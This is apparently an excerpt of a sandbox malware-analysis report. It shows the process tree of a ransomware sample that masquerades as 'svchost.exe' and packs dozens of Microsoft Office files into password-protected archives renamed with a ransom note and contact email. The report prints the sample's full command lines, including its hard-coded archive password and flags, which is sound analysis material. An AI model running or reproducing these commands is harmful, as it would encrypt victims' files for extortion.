  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL097.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL097.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4524
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL102.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL102.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5596
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL103.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL103.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4584
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL104.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL104.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL105.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL105.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:788
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL106.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL106.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5216
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL107.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL107.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4640
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL108.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL108.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3428
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL109.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL109.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1528
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL110.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL110.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5924
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL111.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL111.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:4748
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL112.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL112.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4484
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL115.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL115.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:3564
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL116.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL116.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4108
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL117.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL117.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5308
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL118.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL118.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL119.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL119.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4248
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL120.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL120.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5424
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL121.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL121.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4828
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN001.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN001.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4540
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN002.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN002.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4036
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN010.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN010.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5468
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN011.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN011.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4040
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN020.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN020.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1916
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN022.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN022.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5708
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN026.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN026.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5264
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN027.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN027.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN044.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN044.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN048.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN048.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5532
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN054.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN054.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:620
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN058.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN058.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3924
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN065.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN065.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4000
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN075.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN075.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4764
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN081.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN081.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2220
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN082.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN082.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1508
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN086.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN086.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3460
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN089.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN089.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6048
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN090.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN090.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3576
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN092.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN092.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3656
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN095.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN095.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4144
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN096.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN096.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:184
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN097.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN097.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5984
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN102.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN102.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:4472
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN103.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN103.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4756
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN105.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN105.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN107.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN107.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4220
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN108.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN108.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5752
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN109.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN109.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:216
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN110.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN110.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6044
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN111.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN111.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5500
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN114.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN114.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2912
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN120.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN120.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN121.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN121.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PG_INDEX.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PG_INDEX.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\notice.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\notice.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\POWERPNT.VisualElementsManifest.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\POWERPNT.VisualElementsManifest.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2404
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5196
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable-dark.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable-dark.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2364
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:32
- C:\ProgramData\msvkp\svchost.exe
